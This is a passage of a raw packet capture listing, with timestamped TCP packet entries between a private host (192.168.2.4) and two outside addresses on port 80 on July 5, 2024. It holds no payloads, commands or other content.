                                                                Jul 5, 2024 04:25:33.350126982 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.350157022 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.351938963 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.355392933 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.355420113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.355446100 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.355460882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.355477095 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.355493069 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.355504036 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.355516911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.355541945 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.359863997 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.406681061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406698942 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406724930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406743050 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406758070 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406775951 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406804085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406837940 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406855106 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406872988 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406888962 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406939030 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.406939983 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.406939983 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.406940937 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.406975031 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.407129049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.407144070 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.407160044 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.407190084 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.407206059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.407217979 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.407219887 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.411359072 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.416202068 CEST804991377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:33.417697906 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417711973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417821884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417838097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417851925 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417875051 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417897940 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417907000 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.417916059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417911053 CEST4991380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:33.417932987 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.417932987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417962074 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417963982 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.417975903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.417989969 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418009996 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418028116 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418039083 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418039083 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418073893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418088913 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418106079 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418123960 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418142080 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418198109 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418214083 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418227911 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418239117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418253899 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418313026 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418330908 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418342113 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418346882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418411016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418503046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418518066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418530941 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418533087 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418551922 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418565989 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418581963 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418593884 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418598890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418606997 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418801069 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418834925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418834925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418869972 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418883085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418899059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418916941 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418930054 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418931961 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418941021 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418950081 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418966055 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.418978930 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418978930 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.418989897 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.419049978 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.419064999 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.419079065 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.419085026 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.419110060 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.419126034 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.419137001 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.419143915 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.419152975 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.419172049 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.419195890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.419210911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.419225931 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.423352957 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432056904 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432073116 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432100058 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432116032 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432127953 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432132006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432148933 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432157993 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432171106 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432190895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432214022 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432219028 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432233095 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432356119 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432370901 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432387114 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432390928 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432418108 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432435036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432446003 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432451010 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432468891 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432519913 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432534933 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432549953 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432562113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432576895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432594061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432625055 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.432862043 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.432959080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442127943 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442156076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442182064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442197084 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442212105 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442213058 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442229033 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442238092 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442245960 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442253113 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442339897 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442339897 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442720890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442774057 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442789078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442804098 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442830086 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442832947 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442847013 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442857981 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442862034 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442874908 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.442878962 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.442903996 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443059921 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443082094 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443095922 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443110943 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443133116 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443135023 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443149090 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443160057 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443167925 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443177938 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443186045 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443197012 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443203926 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443213940 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443227053 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443351984 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443408012 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443434954 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443453074 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443469048 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443485975 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443494081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443510056 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443512917 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443526983 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443540096 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443542957 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443552971 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443562984 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443567038 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443586111 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443591118 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443600893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443614006 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443625927 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443633080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443643093 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443654060 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443666935 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.443694115 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443708897 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.443722963 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.444067001 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.500366926 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500397921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500427008 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500442982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500458002 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.500459909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500475883 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500499964 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500503063 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.500503063 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.500516891 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500524998 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.500545025 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.500761032 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.500921011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500936985 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500953913 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500969887 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.500987053 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.501003981 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.501015902 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.501022100 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.501049042 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.503395081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.511874914 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.511894941 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.511923075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.511940002 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.511950970 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.511959076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.511986971 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.511990070 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512001991 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512018919 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512048006 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512048006 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512053013 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512068033 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512079954 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512084007 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512099981 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512115955 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512144089 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512238979 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512326956 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512348890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512375116 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512389898 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512398958 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512398958 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512407064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512423038 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512434006 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512442112 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512456894 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512465954 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512474060 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512489080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512496948 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512496948 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512516022 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512525082 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512531042 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512538910 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512547970 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512562990 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512566090 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512571096 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512588024 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512590885 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512605906 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512619019 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512622118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512628078 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512639046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512645960 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512660027 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512675047 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512682915 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512684107 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512691975 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512698889 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512715101 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512717009 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512736082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512746096 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512751102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512765884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512767076 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512783051 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512787104 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512800932 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512809992 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512825012 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512849092 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512864113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512881041 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512881041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512887955 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.512896061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.512908936 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.513143063 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.513143063 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.522329092 CEST4991380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:33.522753000 CEST4991480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:33.525896072 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.525930882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.525949001 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526032925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526032925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526072979 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526088953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526103973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526118994 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526134014 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526134014 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526137114 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526141882 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526151896 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526165009 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526177883 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526179075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526195049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526206017 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526212931 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526221037 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526230097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526242018 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526247025 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526261091 CEST4990380192.168.2.485.28.47.30
